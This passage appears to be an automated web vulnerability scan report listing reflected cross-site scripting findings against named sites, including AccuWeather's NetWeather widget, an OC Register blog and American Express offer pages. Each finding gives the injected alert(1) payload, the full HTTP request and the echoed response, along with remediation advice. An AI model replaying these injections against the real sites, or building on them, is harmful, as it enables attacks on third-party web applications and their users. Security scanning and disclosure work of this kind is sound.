RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=engdacc4";alert(1)//bc4341ec3d3&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=engdacc4";ale
...[SNIP]...

1.405. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [logo parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the logo request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32db1"%3balert(1)//42b70526543 was submitted in the logo parameter. This input was echoed as 32db1";alert(1)//42b70526543 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=132db1"%3balert(1)//42b70526543&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:57 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n38), ms jfk-agg-n38 ( origin>CONN)
Cache-Control: max-age=3420
Expires: Thu, 03 Feb 2011 17:13:57 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=132db1";alert(1)//42b70526543&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=132db1";ale
...[SNIP]...

1.406. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [metric parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the metric request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2096f"%3balert(1)//1ba13126b12 was submitted in the metric parameter. This input was echoed as 2096f";alert(1)//1ba13126b12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=02096f"%3balert(1)//1ba13126b12&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:19:10 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n26), ms jfk-agg-n26 ( origin>CONN)
Cache-Control: max-age=3300
Expires: Thu, 03 Feb 2011 17:14:10 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
edAttrs["type"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=02096f";alert(1)//1ba13126b12&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=02096f";ale
...[SNIP]...

1.407. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [partner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the partner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37e8c"%3balert(1)//8d39e9c745 was submitted in the partner parameter. This input was echoed as 37e8c";alert(1)//8d39e9c745 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather37e8c"%3balert(1)//8d39e9c745&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:21 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n26), ms jfk-agg-n26 ( origin>CONN)
Cache-Control: max-age=3060
Expires: Thu, 03 Feb 2011 17:07:21 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3911


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
nversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather37e8c";alert(1)//8d39e9c745&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather37e8c";ale
...[SNIP]...

1.408. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [tStyle parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the tStyle request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2cc6"%3balert(1)//085e153a142 was submitted in the tStyle parameter. This input was echoed as c2cc6";alert(1)//085e153a142 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normalc2cc6"%3balert(1)//085e153a142&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:16:38 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n28), ms jfk-agg-n28 ( origin>CONN)
Cache-Control: max-age=3180
Expires: Thu, 03 Feb 2011 17:09:38 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normalc2cc6";alert(1)//085e153a142&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normalc2cc6";ale
...[SNIP]...

1.409. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [target parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the target request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4df0b"%3balert(1)//aada13118d6 was submitted in the target parameter. This input was echoed as 4df0b";alert(1)//aada13118d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=clouds&metric=0&target=_self4df0b"%3balert(1)//aada13118d6 HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:19:31 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n8), ms jfk-agg-n8 ( origin>CONN)
Cache-Control: max-age=2760
Expires: Thu, 03 Feb 2011 17:05:31 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self4df0b";alert(1)//aada13118d6&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=clouds&metric=0&target=_self4df0b";ale
...[SNIP]...

1.410. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [theme parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the theme request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e337d"%3balert(1)//a1ece0aaeff was submitted in the theme parameter. This input was echoed as e337d";alert(1)//a1ece0aaeff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025&lang=eng&size=12&theme=cloudse337d"%3balert(1)//a1ece0aaeff&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:18:53 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n4), ms jfk-agg-n4 ( origin>CONN)
Cache-Control: max-age=3180
Expires: Thu, 03 Feb 2011 17:11:53 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
) ret.embedAttrs["type"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=cloudse337d";alert(1)//a1ece0aaeff&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025&customtheme=&theme=cloudse337d";ale
...[SNIP]...

1.411. http://netweather.accuweather.com/adcbin/netweather_v2/netweatherV2ex.asp [zipcode parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://netweather.accuweather.com
Path:   /adcbin/netweather_v2/netweatherV2ex.asp

Issue detail

The value of the zipcode request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8162"%3balert(1)//ba94b6bb5ca was submitted in the zipcode parameter. This input was echoed as c8162";alert(1)//ba94b6bb5ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adcbin/netweather_v2/netweatherV2ex.asp?partner=netweather&tStyle=normal&logo=1&zipcode=10025c8162"%3balert(1)//ba94b6bb5ca&lang=eng&size=12&theme=clouds&metric=0&target=_self HTTP/1.1
Host: netweather.accuweather.com
Proxy-Connection: keep-alive
Referer: http://www.online6health.com/HEALTH/Acai-Berry/index.php
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 16:17:32 GMT
Server: PWS/1.7.1.2
X-Px: ms jfk-agg-n11 ( jfk-agg-n34), ms jfk-agg-n34 ( origin>CONN)
Cache-Control: max-age=2820
Expires: Thu, 03 Feb 2011 17:04:32 GMT
Age: 0
Content-Type: text/javascript
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 3913


//v1.0
function AC_AddExtension(src, ext)
{
if (src.indexOf('?') != -1)
return src.replace(/\?/, ext+'?');
else
return src + ext;
}

function AC_Generateobj(objAttrs, params, e
...[SNIP]...
uginsPage;
if (mimeType) ret.embedAttrs["type"] = mimeType;
return ret;
}


RunNetWeather ("id","netWxV2","minversion","8,0,0,0","movie","http://netwx.accuweather.com/netWx-V212?zipcode=10025c8162";alert(1)//ba94b6bb5ca&customtheme=&theme=clouds&metric=0&target=_self&lang=eng&url=&video=&category=&logo=1&tStyle=normal&partner=netweather&myspace=0","src","http://netwx.accuweather.com/netWx-V212?zipcode=10025c8162";ale
...[SNIP]...

1.412. http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/ [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ocresort.ocregister.com
Path:   /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5ef3"><script>alert(1)</script>3b1abce3997 was submitted in the REST URL parameter 5. This input was echoed as b5ef3\"><script>alert(1)</script>3b1abce3997 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810b5ef3"><script>alert(1)</script>3b1abce3997/ HTTP/1.1
Host: ocresort.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 19:15:25 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://ocresort.ocregister.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Thu, 03 Feb 2011 19:15:25 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56355

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http://www.w3.org
...[SNIP]...
alternate" type="application/rss+xml" title=" Page not found - Around Disney - www.ocregister.com" href="http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810b5ef3\"><script>alert(1)</script>3b1abce3997/feed/" />
...[SNIP]...

1.413. http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ocresort.ocregister.com
Path:   /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f4a3"><script>alert(1)</script>ebc82fd6548 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f4a3\"><script>alert(1)</script>ebc82fd6548 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/?8f4a3"><script>alert(1)</script>ebc82fd6548=1 HTTP/1.1
Host: ocresort.ocregister.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 19:15:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.5
Vary: Cookie
X-Pingback: http://ocresort.ocregister.com/xmlrpc.php
Link: <http://ocresort.ocregister.com/?p=68810>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 78618


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns="http:
...[SNIP]...
" title=" Disney parks renovate 9 attractions, other areas - Around Disney - www.ocregister.com" href="http://ocresort.ocregister.com/2011/02/03/disney-parks-renovate-9-attractions-other-areas/68810/?8f4a3\"><script>alert(1)</script>ebc82fd6548=1feed/" />
...[SNIP]...

1.414. http://offers.amexnetwork.com/portalext/inline/back_support_mock_ie.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers.amexnetwork.com
Path:   /portalext/inline/back_support_mock_ie.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 457ed'-alert(1)-'43bbf2ba26d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /portalext/inline/back_support_mock_ie.jsp?457ed'-alert(1)-'43bbf2ba26d=1 HTTP/1.1
Host: offers.amexnetwork.com
Proxy-Connection: keep-alive
Referer: http://offers.amexnetwork.com/selects/us/grid?categoryPath=/amexnetwork/category/Shoppinga21a4%22%3E%3Cscript%3Ealert(1)%3C/script%3E9146dd0abe&issuerName=us_prop&inav=menu_rewards_shopping
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Surrogate-Control: no-store
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 15:39:08 GMT
Date: Thu, 03 Feb 2011 15:39:08 GMT
Connection: close
Content-Length: 125

<script>
function getLocation() {
return '457ed'-alert(1)-'43bbf2ba26d=1';
}

parent.reloadHashSemaphore=false;
</script>

1.415. http://offers.amexnetwork.com/selects/us/grid [categoryPath parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers.amexnetwork.com
Path:   /selects/us/grid

Issue detail

The value of the categoryPath request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a21a4"><script>alert(1)</script>9146dd0abe was submitted in the categoryPath parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /selects/us/grid?categoryPath=/amexnetwork/category/Shoppinga21a4"><script>alert(1)</script>9146dd0abe&issuerName=us_prop&inav=menu_rewards_shopping HTTP/1.1
Host: offers.amexnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 14:22:55 GMT
Date: Thu, 03 Feb 2011 14:22:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 215250


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
   
   
                   
...[SNIP]...
10='';s.eVar10='';s.prop20='';s.eVar20='';
                                       switchSubCategory(this);

switchGrid('/PCOfferGridController/searchOffers.do?localLocale=en-us&categoryPath_last=/amexnetwork/category/Shoppinga21a4"><script>alert(1)</script>9146dd0abe&localCountryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&pocsort=2&countryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&issuerName=us_prop&categoryPath=/amexnetwork/category/Travel/Air');

return switc
...[SNIP]...

1.416. http://offers.amexnetwork.com/selects/us/grid [issuerName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers.amexnetwork.com
Path:   /selects/us/grid

Issue detail

The value of the issuerName request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82cc0"%3balert(1)//5ac35aa2ed1 was submitted in the issuerName parameter. This input was echoed as 82cc0";alert(1)//5ac35aa2ed1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop82cc0"%3balert(1)//5ac35aa2ed1&inav=menu_rewards_shopping HTTP/1.1
Host: offers.amexnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 14:28:36 GMT
Date: Thu, 03 Feb 2011 14:28:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 287293


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
   
   
                   
...[SNIP]...
.do?localLocale=en-us&categoryPath=/amexnetwork/category/Shopping&localCountryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&pocsort=2&countryId=ccfb43b68d898110VgnVCM2000007cc6410aRCRD&issuerName=us_prop82cc0";alert(1)//5ac35aa2ed1&popup=true&offerId=<offerId>
...[SNIP]...

1.417. http://offers.amexnetwork.com/selects/us/grid [issuerName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers.amexnetwork.com
Path:   /selects/us/grid

Issue detail

The value of the issuerName request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13a13"><script>alert(1)</script>8d46a60ecb1 was submitted in the issuerName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_prop13a13"><script>alert(1)</script>8d46a60ecb1&inav=menu_rewards_shopping HTTP/1.1
Host: offers.amexnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 14:27:34 GMT
Date: Thu, 03 Feb 2011 14:27:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 291329


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
   
   
                   
...[SNIP]...
<a href="/selects/us?issuerName=us_prop13a13"><script>alert(1)</script>8d46a60ecb1">
...[SNIP]...

1.418. http://offers.amexnetwork.com/selects/us/grid [issuerName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://offers.amexnetwork.com
Path:   /selects/us/grid

Issue detail

The value of the issuerName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bae6e'%3balert(1)//ad3a1fe5923 was submitted in the issuerName parameter. This input was echoed as bae6e';alert(1)//ad3a1fe5923 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /selects/us/grid?categoryPath=/amexnetwork/category/Shopping&issuerName=us_propbae6e'%3balert(1)//ad3a1fe5923&inav=menu_rewards_shopping HTTP/1.1
Host: offers.amexnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Cache-Control: no-cache
Expires: Thu, 03 Feb 2011 14:29:41 GMT
Date: Thu, 03 Feb 2011 14:29:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 287293


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
   
   
                   
...[SNIP]...
